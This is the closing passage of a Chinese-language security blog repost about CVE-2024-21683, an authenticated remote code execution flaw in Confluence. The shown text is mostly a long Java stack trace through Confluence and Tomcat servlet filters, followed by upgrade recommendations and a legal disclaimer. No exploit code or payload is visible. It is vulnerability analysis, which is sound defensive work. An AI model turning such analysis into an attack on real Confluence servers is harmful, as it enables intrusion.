DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:39, ConfluenceActivityFilter (com.atlassian.confluence.util.profiling), ConfluenceActivityFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:62, WebSudoFilter (com.atlassian.confluence.impl.webapp.sudo), WebSudoFilter.javadoFilter:53, HttpFilter (javax.servlet.http), HttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:96, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter), StrutsPrepareFilter.javadoFilter:66, ConfluenceStrutsPrepareFilter (com.atlassian.confluence.impl.struts), ConfluenceStrutsPrepareFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:97, JmxFilter (com.atlassian.confluence.jmx), JmxFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:22, TransactionalCacheFactoryCleanupFilter (com.atlassian.confluence.cache), TransactionalCacheFactoryCleanupFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:17, ServletContextThreadLocalFilter (com.atlassian.core.filters), ServletContextThreadLocalFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:31, UserLoggingContextFilter (com.atlassian.confluence.util), UserLoggingContextFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:25, UserNameHeaderFilter (com.atlassian.confluence.util), UserNameHeaderFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilterInternal:31, MauEventFilter (com.atlassian.confluence.web.filter), MauEventFilter.javadoFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter), AbstractStaticResourceAwareFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, UserThreadLocalFilter (com.atlassian.confluence.util), UserThreadLocalFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:57, ConfluenceTimeoutFilter (com.atlassian.confluence.web.filter), ConfluenceTimeoutFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:83, HttpSessionRegistrarFilter (com.atlassian.confluence.web.filter), HttpSessionRegistrarFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:242, SecurityFilter (com.atlassian.seraph.filter), SecurityFilter.javaapplyFilter:40, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter), ConfluenceSecurityFilter.javadoFilter:29, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter), ConfluenceSecurityFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:94, TrustedApplicationsFilter (com.atlassian.security.auth.trustedapps.filter), TrustedApplicationsFilter.javadoFilter:35, AbstractBootstrapHotSwappingFilter (com.atlassian.confluence.util), AbstractBootstrapHotSwappingFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:148, BaseLoginFilter (com.atlassian.seraph.filter), BaseLoginFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:67, OAuthFilter (com.atlassian.oauth.serviceprovider.internal.servlet), OAuthFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:82, TokenBasedAuthenticationFilter (com.atlassian.pats.web.filter), TokenBasedAuthenticationFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:81, AccessTokenFilter (com.atlassian.oauth2.provider.core.web), AccessTokenFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:57, ClusterHeaderFilter (com.atlassian.confluence.util), ClusterHeaderFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilterInternal:156, OpenSessionInViewFilter (org.springframework.orm.hibernate5.support), OpenSessionInViewFilter.javadoFilterInternal:39, ConfluenceOpenSessionInViewFilter (com.atlassian.confluence.web.filter), ConfluenceOpenSessionInViewFilter.javadoFilter:117, OncePerRequestFilter (org.springframework.web.filter), OncePerRequestFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:24, ConfluenceErrorFilter (com.atlassian.confluence.util), ConfluenceErrorFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:104, ProfilingFilter (com.atlassian.util.profiling.filters), ProfilingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, RequestTimeThreadLocalFilter (com.atlassian.confluence.core.datetime), RequestTimeThreadLocalFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:31, AbstractCachingFilter (com.atlassian.core.filters.cache), AbstractCachingFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:70, DisableBasicAuthFilter (com.atlassian.plugins.authentication.impl.basicauth.filter), DisableBasicAuthFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:26, DefaultAnalyticsFilter (com.atlassian.analytics.client.filter), DefaultAnalyticsFilter.javadoFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:37, JwtAuthFilter (com.atlassian.jwt.internal.servlet), JwtAuthFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter), AbstractThreadNamingFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:58, HttpRequestStatsFilter (com.atlassian.confluence.web.filter), HttpRequestStatsFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilterInternal:114, GzipFilter (com.atlassian.gzipfilter), GzipFilter.javadoFilter:91, GzipFilter (com.atlassian.gzipfilter), GzipFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:47, ConfluenceTimingFilter (com.atlassian.confluence.web.filter), ConfluenceTimingFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:71, WebdavRequestForwardFilter (com.atlassian.confluence.extra.webdav.servlet.filter), WebdavRequestForwardFilter.javadoFilter:29, AbstractHttpFilter (com.atlassian.confluence.extra.webdav.servlet.filter), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:36, MobileAppRequestFilter (com.atlassian.confluence.util), MobileAppRequestFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:59, IgnoreWebAsyncManagerFilter (com.atlassian.confluence.internal.web.filter.spring), IgnoreWebAsyncManagerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:51, RequestParamValidationFilter (com.atlassian.confluence.web.filter.validateparam), RequestParamValidationFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, TranslationModeFilter (com.atlassian.confluence.web.filter), TranslationModeFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, LanguageExtractionFilter (com.atlassian.confluence.web.filter), LanguageExtractionFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javalambda$doFilter$3:44, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.javaperform:-11655779650 (com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter$$Lambda$3822), Unknown SourcedoInRequestContextInternal:84, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.javadoInRequestContext:68, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.javadoFilter:43, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:32, LoggingContextFilter (com.atlassian.confluence.util), LoggingContextFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:67, RequestCacheThreadLocalFilter (com.atlassian.confluence.util), RequestCacheThreadLocalFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:87, TracingFilter (brave.servlet), TracingFilter.javadoFilter:49, ZipkinTracingFilter (com.atlassian.confluence.web.filter), ZipkinTracingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:25, ResponseOutputStreamFilter (com.atlassian.confluence.web.filter), ResponseOutputStreamFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:59, AbstractJohnsonFilter (com.atlassian.johnson.filters), AbstractJohnsonFilter.javadoFilter:32, ConfluenceJohnsonFilter (com.atlassian.confluence.web), ConfluenceJohnsonFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilterInternal:35, ConfluenceEncodingFilter (com.atlassian.confluence.setup), ConfluenceEncodingFilter.javadoFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter), AbstractStaticResourceAwareFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:25, ThreadLocalCacheFilter (com.atlassian.confluence.web.filter), ThreadLocalCacheFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:37, HeaderSanitisingFilter (com.atlassian.core.filters), HeaderSanitisingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:64, FourOhFourErrorLoggingFilter (com.atlassian.confluence.servlet), FourOhFourErrorLoggingFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:35, IpdHttpMonitoringFilter (com.atlassian.confluence.internal.diagnostics.ipd.http), IpdHttpMonitoringFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:42, HttpRequestMonitoringFilter (com.atlassian.confluence.internal.diagnostics), HttpRequestMonitoringFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:129, HttpHeaderSecurityFilter (org.apache.catalina.filters), HttpHeaderSecurityFilter.javadoFilter:48, ConfluenceHttpHeaderSecurityFilter (com.atlassian.confluence.impl.webapp), ConfluenceHttpHeaderSecurityFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:63, DebugFilter (com.atlassian.confluence.web.filter), DebugFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javainvoke:168, StandardWrapperValve (org.apache.catalina.core), StandardWrapperValve.javainvoke:90, StandardContextValve (org.apache.catalina.core), StandardContextValve.javainvoke:481, AuthenticatorBase (org.apache.catalina.authenticator), AuthenticatorBase.javainvoke:765, RemoteIpValve (org.apache.catalina.valves), RemoteIpValve.javainvoke:670, AbstractAccessLogValve (org.apache.catalina.valves), AbstractAccessLogValve.javainvoke:185, StuckThreadDetectionValve (org.apache.catalina.valves), StuckThreadDetectionValve.javainvoke:130, StandardHostValve (org.apache.catalina.core), StandardHostValve.javainvoke:93, ErrorReportValve (org.apache.catalina.valves), ErrorReportValve.javainvoke:74, StandardEngineValve (org.apache.catalina.core), StandardEngineValve.javaservice:342, CoyoteAdapter (org.apache.catalina.connector), CoyoteAdapter.javaservice:390, Http11Processor (org.apache.coyote.http11), Http11Processor.javaprocess:63, AbstractProcessorLight (org.apache.coyote), AbstractProcessorLight.javaprocess:928, AbstractProtocol$ConnectionHandler (org.apache.coyote), AbstractProtocol.javadoRun:1794, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net), NioEndpoint.javarun:52, SocketProcessorBase (org.apache.tomcat.util.net), SocketProcessorBase.javarunWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads), ThreadPoolExecutor.javarun:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads), ThreadPoolExecutor.javarun:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads), TaskThread.javarun:829, Thread (java.lang), Thread.java
漏洞修复建议

升级版本

  • 8.9.1 Data Center Only
  • 8.5.9 (LTS) recommended
  • 7.19.22 (LTS)
都看到这了,点个关注吧~

原文始发于微信公众号(OneTS安全团队):Confluence认证后RCE(CVE-2024-21683)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月20日12:40:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Confluence认证后RCE(CVE-2024-21683)https://cn-sec.com/archives/3649951.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息